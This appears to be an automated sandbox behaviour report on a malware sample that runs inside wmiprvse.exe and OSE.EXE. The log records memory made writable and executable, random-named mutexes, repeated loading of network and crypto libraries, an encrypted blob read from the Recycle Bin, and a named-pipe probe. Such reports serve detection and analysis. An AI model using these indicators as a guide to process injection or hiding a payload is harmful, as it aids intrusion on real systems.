1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2246841239
Thread created PID: 1120 TID: 2780 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2246842408
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2246843381
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2246844971
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2246845963
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2246848482
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2246849427
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2246857847
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: C10000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2246866720
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2246872903
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2246906632
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2250115458
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2250117090
Thread created PID: 1120 TID: 1968 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250124984
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2250126632
System info queried Type: BasicInformation success or wait 2250126949
Thread delayed Time: 0 TID: 6504 success or wait 2250127766
System info queried Type: ProcessorInformation success or wait 2250127926
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250128346
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250187744
System info queried Type: BasicInformation success or wait 2250189916
System info queried Type: ProcessorInformation success or wait 2250190237
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250192302
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250192650
Thread created PID: 1120 TID: 1400 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250194263
Thread created PID: 1120 TID: 1928 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250197060
Thread delayed Time: 0 TID: 6504 success or wait 2250199468
Thread delayed Time: 0 TID: 6504 success or wait 2250199864
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250200040
System info queried Type: BasicInformation success or wait 2250200345
System info queried Type: ProcessorInformation success or wait 2250200648
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250201060
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250204940
System info queried Type: BasicInformation success or wait 2250205800
System info queried Type: ProcessorInformation success or wait 2250206100
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250207339
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250207646
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250207958
System info queried Type: BasicInformation success or wait 2250208254
System info queried Type: ProcessorInformation success or wait 2250208545
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250208953
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250211792
System info queried Type: BasicInformation success or wait 2250212093
System info queried Type: ProcessorInformation success or wait 2250212202
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250212652
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250212764
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250212878
System info queried Type: BasicInformation success or wait 2250212986
System info queried Type: ProcessorInformation success or wait 2250213091
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250213240
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250216032
System info queried Type: BasicInformation success or wait 2250216898
System info queried Type: ProcessorInformation success or wait 2250217199
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250218437
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250218746
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250219260
System info queried Type: BasicInformation success or wait 2250219557
System info queried Type: ProcessorInformation success or wait 2250219849
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250220254
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250224100
System info queried Type: BasicInformation success or wait 2250224918
System info queried Type: ProcessorInformation success or wait 2250225218
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250226456
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250226764
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2250227777
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2250230318
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2250233279
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250249713
System info queried Type: BasicInformation success or wait 2250249968
System info queried Type: ProcessorInformation success or wait 2250252818
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250253253
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2250258733
System info queried Type: BasicInformation success or wait 2250260844
System info queried Type: ProcessorInformation success or wait 2250261159
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250263861
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250264193
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250264596
System info queried Type: BasicInformation success or wait 2250264907
System info queried Type: ProcessorInformation success or wait 2250265216
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250265638
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250271010
System info queried Type: BasicInformation success or wait 2250273270
System info queried Type: ProcessorInformation success or wait 2250273578
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250276635
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250276943
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250277338
System info queried Type: BasicInformation success or wait 2250277649
System info queried Type: ProcessorInformation success or wait 2250277949
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250278368
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250282276
System info queried Type: BasicInformation success or wait 2250284387
System info queried Type: ProcessorInformation success or wait 2250284695
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250286427
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250286733
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250287129
System info queried Type: BasicInformation success or wait 2250287438
System info queried Type: ProcessorInformation success or wait 2250287735
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250288150
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250292143
System info queried Type: BasicInformation success or wait 2250292975
System info queried Type: ProcessorInformation success or wait 2250293279
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250294969
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250295271
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250295953
System info queried Type: BasicInformation success or wait 2250296260
System info queried Type: ProcessorInformation success or wait 2250296556
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250296970
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250300858
System info queried Type: BasicInformation success or wait 2250302963
System info queried Type: ProcessorInformation success or wait 2250303271
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250305369
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250305674
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2250306578
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2250307590
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250316631
System info queried Type: BasicInformation success or wait 2250316949
System info queried Type: ProcessorInformation success or wait 2250317257
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250317673
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250321651
System info queried Type: BasicInformation success or wait 2250322489
System info queried Type: ProcessorInformation success or wait 2250322795
System info queried Type: BasicInformation success or wait 2250325475
System info queried Type: ProcessorInformation success or wait 2250325774
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250326191
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250330092
System info queried Type: BasicInformation success or wait 2250330926
System info queried Type: ProcessorInformation success or wait 2250331230
System info queried Type: BasicInformation success or wait 2250333915
System info queried Type: ProcessorInformation success or wait 2250334212
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250334629
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250338520
System info queried Type: BasicInformation success or wait 2250340626
System info queried Type: ProcessorInformation success or wait 2250341072
System info queried Type: BasicInformation success or wait 2250343575
System info queried Type: ProcessorInformation success or wait 2250343872
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250344293
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250348288
System info queried Type: BasicInformation success or wait 2250350389
System info queried Type: ProcessorInformation success or wait 2250350699
System info queried Type: BasicInformation success or wait 2250353399
System info queried Type: ProcessorInformation success or wait 2250353696
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250354112
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250358039
System info queried Type: BasicInformation success or wait 2250358873
System info queried Type: ProcessorInformation success or wait 2250359178
System info queried Type: BasicInformation success or wait 2250372990
System info queried Type: ProcessorInformation success or wait 2250373289
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250373708
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250377618
System info queried Type: BasicInformation success or wait 2250378453
System info queried Type: ProcessorInformation success or wait 2250378755
System info queried Type: BasicInformation success or wait 2250381418
System info queried Type: ProcessorInformation success or wait 2250381714
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250382130
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250386020
System info queried Type: BasicInformation success or wait 2250386851
System info queried Type: ProcessorInformation success or wait 2250387237
System info queried Type: BasicInformation success or wait 2250389281
System info queried Type: ProcessorInformation success or wait 2250389390
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250389541
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2250391569
System info queried Type: BasicInformation success or wait 2250392424
System info queried Type: ProcessorInformation success or wait 2250392532
System info queried Type: BasicInformation success or wait 2250393766
System info queried Type: ProcessorInformation success or wait 2250393869
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250394015
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2250395948
System info queried Type: BasicInformation success or wait 2250396732
System info queried Type: ProcessorInformation success or wait 2250396840
System info queried Type: BasicInformation success or wait 2250420006
System info queried Type: ProcessorInformation success or wait 2250420110
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250420253
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2250422177
System info queried Type: BasicInformation success or wait 2250423032
System info queried Type: ProcessorInformation success or wait 2250423145
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2250424424
Thread created PID: 1120 TID: 2824 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250425023
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2250431235
Thread delayed Time: 0 TID: 6504 success or wait 2251304967
Thread delayed Time: 0 TID: 6504 success or wait 2251337103
Thread delayed Time: 0 TID: 6504 success or wait 2251337277
Thread delayed Time: 0 TID: 6504 success or wait 2252692853
Thread delayed Time: 0 TID: 6504 success or wait 2252696757
Thread delayed Time: 0 TID: 6504 success or wait 2252700124
Thread delayed Time: 0 TID: 6504 success or wait 2253774850
Thread delayed Time: 0 TID: 6504 success or wait 2253778843
Thread delayed Time: 0 TID: 6504 success or wait 2253782313
Thread delayed Time: 0 TID: 6504 success or wait 2255043472
Thread delayed Time: 0 TID: 6504 success or wait 2255045576
Thread delayed Time: 0 TID: 6504 success or wait 2255047011
Thread delayed Time: 0 TID: 6504 success or wait 2256121281
Thread delayed Time: 0 TID: 6504 success or wait 2256124439
Thread delayed Time: 0 TID: 6504 success or wait 2256129352
Thread delayed Time: 0 TID: 6504 success or wait 2257248608
Thread delayed Time: 0 TID: 6504 success or wait 2257251767
Thread delayed Time: 0 TID: 6504 success or wait 2257255533
Thread delayed Time: 0 TID: 6504 success or wait 2258358188
Thread delayed Time: 0 TID: 6504 success or wait 2258361068
Thread delayed Time: 0 TID: 6504 success or wait 2258365231
Thread delayed Time: 0 TID: 6504 success or wait 2259476888
Thread delayed Time: 0 TID: 6504 success or wait 2259479887
Thread delayed Time: 0 TID: 6504 success or wait 2259484244
Thread delayed Time: 0 TID: 6504 success or wait 2260595117
Thread delayed Time: 0 TID: 6504 success or wait 2260598021
Thread delayed Time: 0 TID: 6504 success or wait 2260602207
Thread delayed Time: 0 TID: 6504 success or wait 2261713772
Thread delayed Time: 0 TID: 6504 success or wait 2261716727
Thread delayed Time: 0 TID: 6504 success or wait 2261721007
Thread delayed Time: 0 TID: 6504 success or wait 2262835840
Thread delayed Time: 0 TID: 6504 success or wait 2262838713
Thread delayed Time: 0 TID: 6504 success or wait 2262842879
Thread delayed Time: 0 TID: 6504 success or wait 2263951205
Thread delayed Time: 0 TID: 6504 success or wait 2263954000
Thread delayed Time: 0 TID: 6504 success or wait 2263958059
Thread delayed Time: 0 TID: 6504 success or wait 2265070097
Thread delayed Time: 0 TID: 6504 success or wait 2265072918
Thread delayed Time: 0 TID: 6504 success or wait 2265077029
Thread delayed Time: 0 TID: 6504 success or wait 2266188446
Thread delayed Time: 0 TID: 6504 success or wait 2266191255
Thread delayed Time: 0 TID: 6504 success or wait 2266195421
Thread delayed Time: 0 TID: 6504 success or wait 2267307097
Thread delayed Time: 0 TID: 6504 success or wait 2267310092
Thread delayed Time: 0 TID: 6504 success or wait 2267314432
Thread delayed Time: 0 TID: 6504 success or wait 2268425678
Thread delayed Time: 0 TID: 6504 success or wait 2268428566
Thread delayed Time: 0 TID: 6504 user apc 2353775492
Thread delayed Time: 0 TID: 6504 user apc 2354224344
Thread delayed Time: 0 TID: 6504 user apc 2354229178
+ Sections
+ General
Start time: 05:48:15
Start date: 01/12/2011
Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
Commandline: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
Imagebase: 0x30000000
File size: 89136 bytes
MD5 hash: 7A56CF3E3F12E8AF599963B16F50FB6A
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown E80000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1 BAE50FD
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 520000 110592 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 520000 110592 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2_32.dll write and read and execute unknown 76390000 118784 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 540000 36864 own pid read write conflicting addresses 1 BAE50FD
